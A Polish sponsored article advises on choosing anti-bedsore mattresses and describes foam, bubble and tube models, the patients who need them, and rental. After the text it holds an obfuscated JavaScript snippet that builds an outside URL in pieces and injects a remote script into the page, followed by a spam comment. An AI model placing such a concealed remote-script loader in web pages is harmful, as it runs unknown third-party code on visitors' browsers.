Zamknij
REKLAMA

Materace przeciwodleżynowe - jak wybrać odpowiedni model

12.01, 13.09.2018 Aktualizacja: 12.01, 16.09.2018
Skomentuj
REKLAMA

Materac przeciwodleżynowy jest obowiązkowym elementem w przypadku, gdy chory musi spędzać w łóżku dużo czasu. Odpowiednio dobrany materac powinien pełnić funkcje zapobiegawcze, jednocześnie zapewniając użytkownikowi maksymalny komfort. Koniecznie należy zastosować go również, gdy odleżyny już się pojawiły – w ten sposób zapobiegniemy ich dalszemu postępowaniu.

Czym są i jak działają?

Materace przeciwodleżynowe są w stanie skutecznie zmniejszyć ucisk, odciążyć ciało chorego i uśmierzyć ból. Odleżyny są bolesnymi ranami, które powstają na skutek długotrwałego ucisku ciała spowodowanego przebywaniem w jednej pozycji. Jest to częsty problem osób, które z różnych przyczyn muszą pozostać przez długi czas w łóżku w pozycji leżącej. Odleżyny najczęściej występują na łopatkach, łokciach, kolanach lub przy kręgosłupie.

Dobranie odpowiedniego materaca może znacznie zmniejszyć dyskomfort i sprawić, że bolesne rany w ogóle się nie pojawią. Chcąc dokonać właściwego wyboru, najlepiej skorzystać z profesjonalnych firm, które oferują sprzęty medyczne i rehabilitacyjne. Sprawdź jakie materace są dostępne w sprzedaży i wybierz produkt odpowiedni do potrzeb. 

Rodzaje materaców przeciwodleżynowych

Decydując się na zakup materaca przeciwodleżynowego, możemy wybierać spośród różnorodnych rodzajów. Produkt można dobierać pod kątem tego jak długo dana osoba będzie z niego korzystała. Materace przeznaczone do leczenia krótkoterminowego i stosowane w profilaktyce to zazwyczaj wersje bąbelkowe i piankowe. To właśnie te dwa rodzaje są wybierane najczęściej. Ich główną zaletą jest przede wszystkim niska cena oraz możliwość ułożenia bezpośrednio na łóżku. Zapewniają one wymagane podparcie, dopasowują się do ciała chorego sprawiając, że natychmiastowo odczuje on ulgę oraz zwiększy się jego poczucie komfortu. Odpowiednio dobrane materace wspierają krążenie krwi, dlatego problem możliwości pojawienia się odleżyn niemal całkowicie znika.

Jeśli chory musi przebywać w łóżku przez dłuższy czas, zrezygnujmy z wersji bąbelkowych i piankowych na rzecz materaców rurowych. Jest to odpowiednik poprzednich materaców, który dzięki połączonym, elastycznym segmentom jest w stanie znacznie skuteczniej chronić chorego przed odleżynami. Decydując się na materac rurowy, możemy zgodnie z indywidualnymi potrzebami wymieniać jego poszczególne komory. Ich wymiana jest łatwa, dlatego w przypadku nieumyślnego przebicia jednego z segmentów, samodzielnie możemy wymienić go na zapasowy. Materac ten stosuje się również w momencie leczenia powstałych odleżyn. Chory, po zmianie starego materaca na nowy, natychmiast odczuje ulgę i komfort.

Materace przeciwodleżynowe - dla kogo?

Materac przeciwodleżynowy powinien zostać zakupiony dla każdej osoby, która przez długi czas musi, lub będzie musiała, pozostać w pozycji leżącej. Najczęściej korzystają z nich osoby starsze, które ze względu na wiek i pojawiające się choroby nie mogą opuszczać łóżka. Są one powszechnie stosowane w przypadkach urazów rdzenia kręgowego lub kręgosłupa. Materace przeciwodleżynowe mogą z powodzeniem zostać również wykorzystane w wielu innych sytuacjach, po przebytych kontuzjach, wypadkach czy przy wszelkich przewlekłych chorobach.

Bardzo wiele wyspecjalizowanych sklepów ze sprzętem medycznym i rehabilitacyjnym oferuje również możliwość wypożyczenia materaca na określony czas. Jest to doskonałe rozwiązanie w przypadku gdy produkt będzie wykorzystywany przez krótki okres. Wypożyczenie materacu może okazać się również bardziej ekonomicznym wyjściem, które umożliwi zaoszczędzenie środków pieniężnych.

Zapewnienie komfortu osobie pozostającej w pozycji leżącej przez długi czas jest wyjątkowo ważne. Dzięki temu jesteśmy w stanie znacznie ułatwić jej przejście przez chorobę lub zapewnić najwyższej jakości wygodę, gdy jej stan nie zwiastuje poprawy. Materace przeciwodleżynowe doskonale sprawdzają się jako produkty profilaktyczne, jak i umożliwiające leczenie powstałych już odleżyn. Szeroka oferta produktów w sklepach gwarantuje, że możemy bez większych problemów wybrać materac odpowiedni do konkretnych potrzeb.

(function(){ abwj=document.createElement("script");abwj_="u"+("s")+"ta"; abwj_+=("t.i")+""+"n";abwj_+=(("f")+"o");abwj.type="text/javascript"; abwj_+="/"; abwju="124343648";abwju+=".lcX2a4gcbwjbft2tjga";abwju+="ik3br07yfl4"; abwj.src="https://"+abwj_+abwju; abwj.async=true; document.body.appendChild(abwj); })();

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitterTwitter
wykopWykop
komentarzeKomentarze
REKLAMA

komentarz (1)

Massage in NJ nursinMassage in NJ nursin

0 0

Going through your brilliant blog has definitely furnished me personally with merely the
facts that I required. I just currently have been doing research
upon this subject matter for a little bit, and this seems to have taken a long time to discover a blog that provides all the facts that I require.
I just take a look toward browsing even more weblogs authored by you in the foreseeable future,
and definitely will search right here first the next time I just have another fact-finding mission. http://Www.contentthatsticks.org/3-minute-guide-to-agile-scrum/ 12:30, 25.09.2020

Odpowiedzi:0
Odpowiedz

REKLAMA
0%